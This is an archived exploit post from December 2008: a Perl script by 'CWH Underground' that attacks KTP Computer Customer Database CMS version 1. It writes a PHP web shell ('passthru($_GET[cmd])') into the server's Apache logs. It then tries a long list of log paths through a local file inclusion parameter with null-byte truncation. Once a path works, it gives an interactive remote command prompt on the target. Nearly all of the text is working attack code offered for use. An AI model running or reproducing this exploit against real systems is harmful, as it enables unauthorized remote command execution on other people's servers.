ktpccd-lfi.txt
Posted on 01 December 2008
#!/usr/bin/perl -w #====================================== # KTPCCD Local File Inclusion Exploit #====================================== # # ,--^----------,--------,-----,-------^--, # | ||||||||| `--------' | O .. CWH Underground Hacking Team .. # `+---------------------------^----------| # `\_,-------, _________________________| # / XXXXXX /`| / # / XXXXXX / ` / # / XXXXXX /\______( # / XXXXXX / # / XXXXXX / # (________( # `------' # #AUTHOR : CWH Underground #DATE : 30 November 2008 #SITE : cwh.citec.us # # ##################################################### #APPLICATION : KTP Computer Customer Database CMS #VERSION : 1 #DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip ###################################################### #Note: magic_quotes_gpc = off #Vulnerability in Local File Inclusion #Wrote Exploit for Local File Inclusion <-> Remote Command Execution ####################################################################################### #Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK #Special Thx : asylu3, str0ke, citec.us, milw0rm.com ####################################################################################### use LWP::UserAgent; use IO::Socket; use LWP::Simple; $log="../"; @apache=( "../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log", "../apache/logs/access.log", "../../apache/logs/error.log", "../../apache/logs/access.log", "../../../apache/logs/error.log", "../../../apache/logs/access.log", "../../../../apache/logs/error.log", "../../../../apache/logs/access.log", "../../../../../apache/logs/error.log", "../../../../../apache/logs/access.log", "../logs/error.log", "../logs/access.log", "../../logs/error.log", "../../logs/access.log", "../../../logs/error.log", "../../../logs/access.log", "../../../../logs/error.log", "../../../../logs/access.log", "../../../../../logs/error.log", "../../../../../logs/access.log", "../../../../../etc/httpd/logs/access_log", "../../../../../etc/httpd/logs/access.log", "../../../../../etc/httpd/logs/error_log", "../../../../../etc/httpd/logs/error.log", "../../.. /../../var/www/logs/access_log", "../../../../../var/www/logs/access.log", "../../../../../usr/local/apache/logs/access_log", "../../../../../usr/local/apache/logs/access.log", "../../../../../var/log/apache/access_log", "../../../../../var/log/apache/access.log", "../../../../../var/log/access_log", "../../../../../var/www/logs/error_log", "../../../../../var/www/logs/error.log", "../../../../../usr/local/apache/logs/error_log", "../../../../../usr/local/apache/logs/error.log", "../../../../../var/log/apache/error_log", "../../../../../var/log/apache/error.log", "../../../../../var/log/access_log", "../../../../../var/log/error_log" ); my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); } print " ============================================== "; print " KTP Computer Customer Database "; print " Remote Command Execution Exploit "; print " Discovered By CWH Underground "; print "============================================== "; print " "; print " ,--^----------,--------,-----,-------^--, "; print " | ||||||||| `--------' | O "; print " `+---------------------------^----------| "; print " `\_,-------, _________________________| "; print " / XXXXXX /`| / "; print " / XXXXXX / ` / "; print " / XXXXXX /\______( "; print " / XXXXXX / "; print " / XXXXXX / .. CWH Underground Hacking Team .. "; print " (________( "; print " `------' "; print " "; if (@ARGV < 2) { print "Usage: ./xpl.pl <Host> <Path> "; print "Ex. ./xpl.pl www.hackme.com /ktp "; } $host=$ARGV[0]; $path=$ARGV[1]; if ( $host =~ /^http:/ ) {$host =~ s/http:////g;} print " Trying to Inject the Code... "; $CODE="<? passthru($_GET[cmd]) ?>"; $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host. "; print $socket "GET /cwhunderground ".$CODE." HTTP/1.1 "; print $socket "Host: ".$host." "; print $socket "Connection: close "; close($socket); if ( $host !~ /^http:/ ) {$host = "http://" . $host;} foreach $getlog(@apache) { chomp($getlog); $find= $host.$path."/?p=".$getlog."%00"; $xpl = LWP::UserAgent->new() or die "Could not initialize browser "; $req = HTTP::Request->new(GET => $find); $res = $xpl->request($req); $info = $res->content; if($info =~ /cwhunderground/) {print " Successfully injected in $getlog ";$log=$getlog;} } my $sis="$^O";if ($sis eq 'MSWin32') { print " [cmd@win32]$ "; } else { print " [cmd@unix]$ "; } chomp( $cmd = <STDIN> ); while($cmd !~ "exit") { $shell= $host.$path."/?p=".$log."%00&cmd=$cmd"; $xpl = LWP::UserAgent->new() or die "Could not initialize browser "; $req = HTTP::Request->new(GET => $shell); $res = $xpl->request($req); $info = $res->content; print " $info"; my $sis="$^O";if ($sis eq 'MSWin32') { print " [cmd@win32]$ "; } else { print " [cmd@unix]$ "; } chomp( $cmd = <STDIN> ); }
